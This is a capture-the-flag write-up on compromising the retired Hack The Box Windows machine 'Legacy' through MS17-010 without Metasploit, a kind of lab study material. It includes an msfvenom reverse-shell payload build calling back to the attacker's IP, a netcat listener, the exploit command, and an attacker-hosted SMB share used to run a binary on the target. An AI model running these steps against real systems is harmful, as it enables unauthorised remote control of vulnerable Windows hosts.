HTB Walkthrough: Legacy w/o Metasploit (retired)

Legacy is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Legacy | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(kali㉿kali)-[~/labs/HTB/Legacy]
└─$ nmap -Pn -oA Legacy-ping 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–12 16:14 EDT
Nmap scan report for 10.10.10.4
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server

SMB ports (139, 445) are open.

Enumeration

┌──(kali㉿kali)-[~/labs/HTB/Legacy]
└─$ nmap -Pn — script smb-vuln* -p 139,445 10.10.10.4

Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–12 17:32 EDT
Nmap scan report for 10.10.10.4
Host is up (0.029s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms08–067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08–067)
| State: VULNERABLE
| IDs: CVE:CVE-2008–4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008–10–23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08–067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10–054: false
|_smb-vuln-ms10–061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17–010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17–010)
| State: VULNERABLE
| IDs: CVE:CVE-2017–0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17–010).

It is vulnerable to ms08–067 and ms17–010. Exploiting the ms17–010 vulnerability. Google search ‘ms17–010 exploit’. Refer to this article: https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/ .

Exploitation

Download exploit from: https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py . Get the gun-zipped Impacket file and once it is untarred, run “pip install .”. Save mysmb.py file (https://github.com/worawit/MS17-010/blob/master/mysmb.py) in the directory where ‘send_and_execute.py is present.
Generate payload (ms17–010.exe) using msfvenom.

┌──(kali㉿kali)-[~/labs/HTB/opt/impacket-0.9.22]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP> LPORT=443 EXITFUNC=thread -f exe -a x86 — platform windows -o ms17–010.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17–010.exe

┌──(kali㉿kali)-[~/labs/HTB/opt/impacket-0.9.22]
└─$ chmod +x ms17–010.exe

Running the exploit:
(a) Open a netcat session in another window: sudo nc -lvnp 443
(b)
┌──(kali㉿kali)-[~/labs/HTB/opt/impacket-0.9.22]
└─$ python ~/labs/HTB/Legacy/send_and_execute.py 10.10.10.4 ms17–010.exe
You should get a reverse shell. Finding the username:
(a) Locate whoami.exe in kali:
┌──(kali㉿kali)-[~]
└─$ locate whoami.exe
/usr/share/windows-resources/binaries/whoami.exe
(b) Locate smbserver.py in kali:
Use smbserver.py from the impacket installation directory.
c) In kali: Basically we are opening a share ‘a’ and serving ‘whoami.exe’ (/usr/share/windows-resources/binaries/)
┌──(kali㉿kali)-[~/…/HTB/opt/impacket-0.9.22/impacket]
└─$ sudo smbserver.py a /usr/share/windows-resources/binaries/

(d) In reverse shell (target windows):
C:\Documents and Settings\Administrator\Desktop>\\10.10.xx.xx\a\whoami.exe

Syntax: \\<Kali-IP>\<opened share>\<binary>
Since you are administrator, you do not need to escalate the privileges. Finding flags:
User flag: “C:\Documents and Settings\john\Desktop>type user.txt”.
Root flag: “C:\Documents and Settings\Administrator\Desktop>type root.txt”.